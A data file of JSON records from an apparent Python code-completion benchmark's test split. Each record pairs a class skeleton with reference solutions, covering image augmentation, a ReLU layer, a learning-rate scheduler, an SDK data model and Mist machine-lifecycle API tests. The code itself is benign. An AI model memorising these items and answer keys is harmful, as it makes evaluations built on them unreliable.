<|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n self.offset = offset\n self.p = p\n self.down_scale = 1\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. 
:param data: An array of two elements (images, targets) :return:\"\"\"\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n", "source": "the_stack_v2_python_sparse", "source_path": "python/TobyPDE_FRRN/FRRN-master/dltools/augmentation.py", "source_repo": "LiuFang816/SALSTM_py_data", "split": "test", "star_events_count": 10} {"blob_id": "045502406b37d45cda9fe2299a0c64c3e688a1e9", "bodies": ["is_np = isinstance(inputs, np.ndarray)\nif is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\noutputs = torch.nn.functional.relu(inputs)\nif is_np:\n return outputs.numpy()\nreturn outputs", "serialized = transformer_pb.Layer()\nserialized.relu_data.SetInParent()\nreturn serialized", "if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\nreturn None"], "bodies_text": "<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "class_docstring": "Represents a rectified-linear layer in a network.", "class_name": "ReluLayer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = 
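Shape conventions in the TranslationAugmentor record above: the slicing implies channel-first (C, H, W) images and (H, W) label maps; embed_image reflect-pads the vacated border, while embed_labels fills it with the don't-care value -1 so shifted-in pixels can be ignored by the loss. A small check, assuming the class above and numpy as np:

import numpy as np

aug = TranslationAugmentor(offset=2, p=1)
image = np.arange(2 * 4 * 4, dtype=np.float32).reshape(2, 4, 4)  # (C, H, W)
label = np.arange(16).reshape(4, 4)                              # (H, W)

shifted = aug.embed_image(image, offset=[1, 0])   # shift content one row down
assert shifted.shape == image.shape
assert np.array_equal(shifted[:, 1:, :], image[:, :-1, :])  # top row is reflected padding

shifted_label = aug.embed_labels(label, offset=[1, 0])
assert (shifted_label[0] == -1).all()             # vacated row becomes don't-care
assert np.array_equal(shifted_label[1:], label[:-1])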
transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000375", "length_bytes": 1067, "license_type": "permissive", "methods": [{"docstring": "Computes ReLU(@inputs).", "name": "compute", "signature": "def compute(self, inputs)"}, {"docstring": "Serializes the layer for use with the transformer server.", "name": "serialize", "signature": "def serialize(self)"}, {"docstring": "Deserializes the layer from the Protobuf format.", "name": "deserialize", "signature": "def deserialize(cls, serialized)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006937", "prompt": "Implement the Python class `ReluLayer` described below.\n\nClass description:\nRepresents a rectified-linear layer in a network.\n\nMethod signatures and docstrings:\n- def compute(self, inputs): Computes ReLU(@inputs).\n- def serialize(self): Serializes the layer for use with the transformer server.\n- def deserialize(cls, serialized): Deserializes the layer from the Protobuf format.", "prompted_full_text": "Implement the Python class `ReluLayer` described below.\n\nClass description:\nRepresents a rectified-linear layer in a network.\n\nMethod signatures and docstrings:\n- def compute(self, inputs): Computes ReLU(@inputs).\n- def serialize(self): Serializes the layer for use with the transformer server.\n- def deserialize(cls, serialized): Deserializes the layer from the Protobuf format.\n\n<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n<|end_body_0|>\n\n<|body_start_1|>\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n<|end_body_1|>\n\n<|body_start_2|>\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n<|end_body_2|>\n", "revision_id": "19abf589e84ee67317134573054c648bb25c244d", "skeleton": "<|skeleton|>\nclass ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n <|body_0|>\n\n def serialize(self):\n \"\"\"Serializes the layer for use with the transformer server.\"\"\"\n <|body_1|>\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReluLayer:\n \"\"\"Represents a rectified-linear layer in a network.\"\"\"\n\n def compute(self, inputs):\n \"\"\"Computes ReLU(@inputs).\"\"\"\n is_np = isinstance(inputs, np.ndarray)\n if is_np:\n inputs = torch.tensor(inputs, dtype=torch.float32)\n outputs = torch.nn.functional.relu(inputs)\n if is_np:\n return outputs.numpy()\n return outputs\n\n def serialize(self):\n \"\"\"Serializes the layer for use 
with the transformer server.\"\"\"\n serialized = transformer_pb.Layer()\n serialized.relu_data.SetInParent()\n return serialized\n\n def deserialize(cls, serialized):\n \"\"\"Deserializes the layer from the Protobuf format.\"\"\"\n if serialized.WhichOneof('layer_data') == 'relu_data':\n return cls()\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "pysyrenn/frontend/relu_layer.py", "source_repo": "95616ARG/SyReNN", "split": "test", "star_events_count": 38} {"blob_id": "6b5564c2c0089331b30bec82dbf92a73bedf83f5", "bodies": ["self.lr_scheds = [p.lr_step for p in self.phases]\nself.mom_scheds = [p.mom_step for p in self.phases]\nself.opt = self.learn.opt\nself.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\nself.idx_s = 0", "if self.idx_s >= len(self.lr_scheds):\n return True\nself.opt.lr = self.lr_scheds[self.idx_s].step()\nself.opt.mom = self.mom_scheds[self.idx_s].step()\nif self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1"], "bodies_text": "<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "class_docstring": "Schedule multiple `TrainingPhase` for a `learner`", "class_name": "GeneralScheduler", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000376", "length_bytes": 27312, "license_type": "permissive", "methods": [{"docstring": "Initialize our lr and mom schedules for training", "name": "on_train_begin", "signature": "def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None"}, {"docstring": "Take a step in lr,mom sched, start next sched when current is complete", "name": "on_batch_end", "signature": "def on_batch_end(self, **kwargs: Any) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001531", "prompt": "Implement the Python class `GeneralScheduler` described below.\n\nClass description:\nSchedule multiple `TrainingPhase` for a `learner`\n\nMethod signatures and docstrings:\n- def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None: Initialize our lr and mom 
schedules for training\n- def on_batch_end(self, **kwargs: Any) -> None: Take a step in lr,mom sched, start next sched when current is complete", "prompted_full_text": "Implement the Python class `GeneralScheduler` described below.\n\nClass description:\nSchedule multiple `TrainingPhase` for a `learner`\n\nMethod signatures and docstrings:\n- def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None: Initialize our lr and mom schedules for training\n- def on_batch_end(self, **kwargs: Any) -> None: Take a step in lr,mom sched, start next sched when current is complete\n\n<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n<|end_body_1|>\n", "revision_id": "7989b9721dda08fd1df146666f0855f1832e252e", "skeleton": "<|skeleton|>\nclass GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n <|body_0|>\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GeneralScheduler:\n \"\"\"Schedule multiple `TrainingPhase` for a `learner`\"\"\"\n\n def on_train_begin(self, n_epochs: int, **kwargs: Any) -> None:\n \"\"\"Initialize our lr and mom schedules for training\"\"\"\n self.lr_scheds = [p.lr_step for p in self.phases]\n self.mom_scheds = [p.mom_step for p in self.phases]\n self.opt = self.learn.opt\n self.opt.lr, self.opt.mom = (self.lr_scheds[0].start, self.mom_scheds[0].start)\n self.idx_s = 0\n\n def on_batch_end(self, **kwargs: Any) -> None:\n \"\"\"Take a step in lr,mom sched, start next sched when current is complete\"\"\"\n if self.idx_s >= len(self.lr_scheds):\n return True\n self.opt.lr = self.lr_scheds[self.idx_s].step()\n self.opt.mom = self.mom_scheds[self.idx_s].step()\n if self.lr_scheds[self.idx_s].is_done:\n self.idx_s += 1\n", "source": "the_stack_v2_python_sparse", "source_path": "dev_nb/nb_004.py", "source_repo": "EmbraceLife/fastai_docs", "split": "test", "star_events_count": 3} {"blob_id": "599335427fffc97d46e9023de8f0dba1753c4857", "bodies": ["self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\nself.passive_only = passive_only\nself.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order", "if dictionary is None:\n return None\npassive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\npassive_only = 
dictionary.get('passiveOnly')\nuse_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\nreturn cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)"], "bodies_text": "<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data", "class_name": "ExchangeDAGProtectionPreference", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000377", "length_bytes": 3474, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ExchangeDAGProtectionPreference class", "name": "__init__", "signature": "def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `ExchangeDAGProtectionPreference` described below.\n\nClass description:\nImplementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\n\nMethod signatures and docstrings:\n- def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None): Constructor for the ExchangeDAGProtectionPreference class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ExchangeDAGProtectionPreference` described below.\n\nClass description:\nImplementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. 
The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\n\nMethod signatures and docstrings:\n- def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None): Constructor for the ExchangeDAGProtectionPreference class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. 
The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/exchange_dag_protection_preference.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b04e0ffd4350d683d2834df70b4b1d9a01b13361", "bodies": ["create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\nuri = MIST_URL + '/api/v2/machines'\nrequest = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\nmachine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, 
timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')"], "bodies_text": "<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n 